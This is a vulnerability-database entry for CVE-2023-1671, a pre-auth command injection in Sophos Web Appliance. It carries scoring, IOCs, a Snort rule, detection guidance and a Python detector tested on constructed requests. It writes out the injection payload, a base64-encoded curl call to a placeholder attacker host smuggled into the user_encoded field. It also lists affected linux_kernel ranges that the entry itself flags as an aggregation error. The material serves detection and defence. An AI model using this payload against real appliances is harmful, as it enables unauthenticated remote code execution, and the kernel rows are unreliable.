CVE-2023-1671
published 2023-04-04

CVE-2023-1671: A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.

Priority: P1 (97, critical); CVSS 3.1 base score 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV, ITW, EXPLOIT, Initial access
CISA Known Exploited Vulnerability, remediation due 2023-12-07
Exploited in the wild
EPSS: 100.00% (100.0th percentile)

Affected

5 ranges

Vendor | Product | Version range | Fixed in
linux | linux_kernel | >= 5.13.0 < 5.15.121 | 5.15.121
linux | linux_kernel | >= 5.16.0 < 6.1.40 | 6.1.40
linux | linux_kernel | >= 6.2.0 < 6.4.5 | 6.4.5
sophos | sophos_web_appliance | >= unspecified < 4.3.10.4 | 4.3.10.4
sophos | web_appliance | < 4.3.10.4 | 4.3.10.4

Note: the description above names only the Sophos Web Appliance, fixed in 4.3.10.4. The three linux_kernel rows do not match that description and appear to be an aggregation error in the affected-product data; treat the two sophos rows as the authoritative scope.

Detection & IOCs (extracted from sources)

url: /index.php?c=blocked&action=continue
path: /index.php?c=blocked&action=continue
command (POST body): args_reason=filetypewarn&url=<rand>&filetype=<rand>&user=<rand>&user_encoded=<base64("';curl http://<oast-url> #")>
other (Shodan query): http.favicon.hash:-893681401
snort:
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Sophos Web Appliance Pre-Auth Command Injection Attempt (CVE-2023-1671)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:36; content:"|2f|index|2e|php|3f|c|3d|blocked|26|action|3d|continue"; http.request_body; content:"args_reason=filetypewarn&url="; startswith; fast_pattern; content:"&filetype="; content:"&user_encoded="; reference:url,sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce; classtype:attempted-admin; sid:2049632; rev:2; metadata:attack_target Client_Endpoint, created_at 2023_12_11, cve CVE_2023_1671, deployment Perimeter, deployment SSLDecrypt, confidence High, signature_severity Major, tag cve_2023_1671, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_27, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
bytes (URI match): |2f|index|2e|php|3f|c|3d|blocked|26|action|3d|continue
  • Look for HTTP POST requests to /index.php with the query parameters c=blocked&action=continue; this is the vulnerable warn-proceed handler endpoint.
  • Inspect the POST body for args_reason=filetypewarn combined with a user_encoded parameter whose base64-decoded value contains shell metacharacters (single quote, semicolon, backtick, pipe, redirection) or a command name such as curl or wget.
  • Detect out-of-band callback activity (DNS or HTTP) originating from the Sophos Web Appliance host; a callback following a matching POST indicates the injected command ran.
  • Use Shodan/FOFA title or favicon-hash searches to inventory Internet-exposed Sophos Web Appliance instances; anything still reachable is a target.
  • The exploit is pre-authentication, so the absence of a session cookie or login is not a mitigating signal. Legitimate users who click through a file-type warning also POST to this endpoint, so the decoded user_encoded content, not the endpoint alone, is the discriminator.
  • ET Snort SID 2049632 (rev:2) covers this exploit attempt; ensure IDS/IPS rulesets are updated to at least this revision.
  • The Snort/ET rule is tagged deployment SSLDecrypt: the appliance is normally accessed over HTTPS, so the rule only fires if the sensor sees decrypted traffic.
  • Sophos Web Appliance reached end-of-life on July 20, 2023 and no longer receives updates. The fix in 4.3.10.4 was delivered as an automatic patch on April 4, 2023, but only to instances that had not disabled auto-patching; anything else remains vulnerable and should be replaced.
  • The URI bsize match in the Snort rule is exactly 36 bytes (the length of /index.php?c=blocked&action=continue); a rule engine that mishandles the bsize keyword will produce false negatives.
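The detection logic the bullets above describe, run over constructed sample requests, as an added example. This is not Sophos code and not tooling from the vulnerability database; the raw-request format, the hostnames (swa.example.internal, files.example.test, attacker.example as a stand-in for an OAST host) and the sample bodies are assumptions made for the demo. The endpoint, parameter names and payload shape are the ones listed in the IOCs.

```python
"""Added example for the detection bullets above. This is not Sophos code and
not tooling from the vulnerability database; the request samples are
constructed here, and every hostname in them is a placeholder."""
import base64
import binascii
import re
from typing import Optional
from urllib.parse import parse_qs, quote, urlsplit

# Endpoint and body parameters come from the IOCs listed above.
VULN_PATH = "/index.php"
# Characters that turn a quoted shell argument into a second command.
SHELL_META = re.compile(r"[;'\"`|&$(){}<>\n\\]")


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.1 request into method, request-target and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    method, target, _version = request_line.split(" ", 2)
    return {"method": method, "target": target, "body": body.decode("latin-1")}


def decode_user_encoded(value: str) -> Optional[str]:
    """Base64-decode user_encoded, or return None if it is not base64.

    parse_qs maps a literal '+' to a space, so an attacker who skips
    percent-encoding would otherwise slip past a strict decode; retry with
    the '+' restored before giving up."""
    for candidate in (value, value.replace(" ", "+")):
        try:
            return base64.b64decode(candidate, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue
    return None


def classify(raw: bytes) -> dict:
    """Stage-by-stage verdict for one request.

    'hit' is True only when all three exploit conditions hold: a POST to the
    warn-proceed handler, a filetypewarn body, and a user_encoded value that
    decodes to shell metacharacters. A real user clicking 'continue' on a
    file-type warning produces the first two stages legitimately, so the
    endpoint alone is not an indicator."""
    req = parse_request(raw)
    parts = urlsplit(req["target"])
    verdict = {"endpoint": False, "filetypewarn": False, "metachars": False,
               "decoded": None, "hit": False}
    query = parse_qs(parts.query)
    if (req["method"] != "POST" or parts.path != VULN_PATH
            or query.get("c") != ["blocked"] or query.get("action") != ["continue"]):
        return verdict
    verdict["endpoint"] = True
    body = parse_qs(req["body"], keep_blank_values=True)
    if body.get("args_reason") != ["filetypewarn"]:
        return verdict
    verdict["filetypewarn"] = True
    decoded = decode_user_encoded(body.get("user_encoded", [""])[0])
    verdict["decoded"] = decoded
    if decoded is not None and SHELL_META.search(decoded):
        verdict["metachars"] = True
        verdict["hit"] = True
    return verdict


def build_request(user_encoded_param: str) -> bytes:
    """Constructed sample POST; user_encoded_param is inserted verbatim so the
    caller controls whether it is percent-encoded."""
    body = ("args_reason=filetypewarn&url=http%3A%2F%2Ffiles.example.test%2Fx.exe"
            "&filetype=exe&user=guest&user_encoded=" + user_encoded_param)
    return (b"POST /index.php?c=blocked&action=continue HTTP/1.1\r\n"
            b"Host: swa.example.internal\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n"
            + body.encode())


# Constructed samples. attacker.example stands in for an OAST callback host.
EXPLOIT_CMD = "';curl http://attacker.example/x #"
SAMPLES = {
    "exploit": build_request(quote(base64.b64encode(EXPLOIT_CMD.encode()).decode(), safe="")),
    "exploit_raw_plus": build_request("YWI+"),  # base64("ab>") sent with a bare '+'
    "benign": build_request(base64.b64encode(b"jsmith").decode()),
    "other_action": b"POST /index.php?c=blocked&action=view HTTP/1.1\r\nHost: x\r\n\r\n"
                    b"args_reason=filetypewarn&user_encoded=anNtaXRo",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:17} {classify(raw)}")
```

The staged verdict mirrors the Snort rule (method, URI, body prefix, parameter names) and then adds the one check a content signature cannot do, decoding user_encoded and looking at what it contains, which is what separates an exploit attempt from a user clicking through a warning. Feed it request bodies from a proxy or full-packet capture of decrypted traffic; an encrypted session yields nothing, as the SSLDecrypt tag on the rule warns.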

CVSS provenance

nvd: v3.1, 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck: 9.8 CRITICAL
cisa: 9.8 CRITICAL